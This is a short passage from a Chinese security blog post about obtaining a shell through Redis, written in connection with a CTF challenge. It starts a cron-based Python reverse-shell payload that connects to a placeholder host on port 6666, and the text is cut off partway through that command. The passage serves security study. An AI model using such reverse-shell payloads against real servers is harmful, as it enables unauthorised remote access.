LoRexxar's Blog

通过redis getshell的一些小问题

之前在出AT Field的时候,在通过redis弹shell的过程中遇到一些问题,今天专门测试一下,解决一些疑惑 这里我们不考虑如何写入redis中,只考虑从redis到服务器这个过程 使用两种反弹shell的方式,第一种是python弹的 1* * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx",6666));os.dup2(s.fileno(),0); os.dup2(s.file...